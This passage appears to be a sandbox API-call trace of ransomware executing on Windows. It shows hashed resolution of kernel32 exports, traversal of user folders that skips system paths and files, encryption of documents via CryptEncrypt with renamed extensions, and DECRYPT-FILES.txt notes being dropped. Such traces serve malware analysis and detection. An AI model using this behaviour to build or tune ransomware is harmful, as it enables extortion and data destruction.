lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.436] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.436] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.436] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.436] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.436] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.436] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.436] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.437] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.437] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.437] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.437] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.437] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.437] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.437] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.437] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.437] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.437] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.437] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.437] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.437] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.437] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.437] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.437] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.437] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.437] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.437] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.438] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.438] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.438] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.438] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.438] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.438] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.438] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.438] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.438] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.438] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.438] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt") returned 73 [0084.438] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt.9Ot6wi0") returned 81 [0084.438] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\faus_oitolqc.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt.9Ot6wi0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\faus_oitolqc.ppt.9ot6wi0"), dwFlags=0x0) returned 1 [0084.439] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.439] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.439] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.440] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdfafcb60, ftCreationTime.dwHighDateTime=0x1d4caad, ftLastAccessTime.dwLowDateTime=0xc73fc960, ftLastAccessTime.dwHighDateTime=0x1d4cd49, ftLastWriteTime.dwLowDateTime=0xc73fc960, ftLastWriteTime.dwHighDateTime=0x1d4cd49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i4ouEKS0Y1j5q3bJi", cAlternateFileName="I4OUEK~1")) returned 1 [0084.440] lstrcmpW (lpString1="i4ouEKS0Y1j5q3bJi", lpString2=".") returned 1 [0084.440] lstrcmpW (lpString1="i4ouEKS0Y1j5q3bJi", lpString2="..") returned 1 [0084.440] lstrcatW (in: lpString1="i4ouEKS0Y1j5q3bJi", lpString2="\\" | out: lpString1="i4ouEKS0Y1j5q3bJi\\") returned="i4ouEKS0Y1j5q3bJi\\" [0084.440] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Program Files") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch=":\\Windows") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Games\\") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\All Users") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="AhnLab") returned 0x0 [0084.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.440] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0084.440] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.440] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\\\jkbimi8.tmp") returned 87 [0084.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0084.441] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0084.441] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.441] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\\\DECRYPT-FILES.txt") returned 93 [0084.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0084.441] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0084.442] CloseHandle (hObject=0x42c) returned 1 [0084.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0084.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\*" [0084.442] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdfafcb60, ftCreationTime.dwHighDateTime=0x1d4caad, ftLastAccessTime.dwLowDateTime=0xae87bd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae87bd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0084.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.442] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdfafcb60, ftCreationTime.dwHighDateTime=0x1d4caad, ftLastAccessTime.dwLowDateTime=0xae87bd40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae87bd40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.442] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.442] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.443] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26eaa870, ftCreationTime.dwHighDateTime=0x1d4c779, ftLastAccessTime.dwLowDateTime=0x9aca3c20, ftLastAccessTime.dwHighDateTime=0x1d4cfa7, ftLastWriteTime.dwLowDateTime=0x9aca3c20, ftLastWriteTime.dwHighDateTime=0x1d4cfa7, nFileSizeHigh=0x0, nFileSizeLow=0x14c85, dwReserved0=0x0, dwReserved1=0x0, cFileName="52sYE55ED9y1bqufgLex.pdf", cAlternateFileName="52SYE5~1.PDF")) returned 1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="DECRYPT-FILES.txt") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="autorun.inf") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="boot.ini") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="desktop.ini") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="ntuser.dat") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="iconcache.db") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="bootsect.bak") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="ntuser.dat.log") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="thumbs.db") returned -1 [0084.443] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.pdf", lpString2="Bootfont.bin") returned -1 [0084.443] lstrlenW (lpString="52sYE55ED9y1bqufgLex.pdf") returned 24 [0084.443] lstrcmpiW (lpString1="pdf", lpString2="lnk") returned 1 [0084.443] lstrcmpiW (lpString1="pdf", lpString2="exe") returned 1 [0084.443] lstrcmpiW (lpString1="pdf", lpString2="sys") returned -1 [0084.443] lstrcmpiW (lpString1="pdf", lpString2="dll") returned 1 [0084.443] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0084.443] lstrlenW (lpString="52sYE55ED9y1bqufgLex.pdf") returned 24 [0084.443] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0084.443] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="52sYE55ED9y1bqufgLex.pdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf" [0084.443] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\52sYE55ED9y1bqufgLex.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\52sye55ed9y1bqufglex.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.443] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=85125) returned 1 [0084.444] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.444] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.444] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.444] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.444] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.444] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.444] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.446] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.446] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.447] CloseHandle (hObject=0x43c) returned 1 [0084.447] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.448] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.449] CloseHandle (hObject=0x0) returned 0 [0084.449] CloseHandle (hObject=0x438) returned 1 [0084.449] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.449] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.449] GetTickCount () returned 0x114d930 [0084.449] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.450] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.450] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.450] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.450] lstrlenA (lpString="kernel32.dll") returned 12 [0084.450] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.450] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.450] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.451] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.451] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.451] lstrlenA (lpString="ADDATOMA") returned 8 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.451] lstrlenA (lpString="ADDATOMW") returned 8 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.451] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.451] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.451] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.451] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.451] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.451] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.451] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.451] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.451] 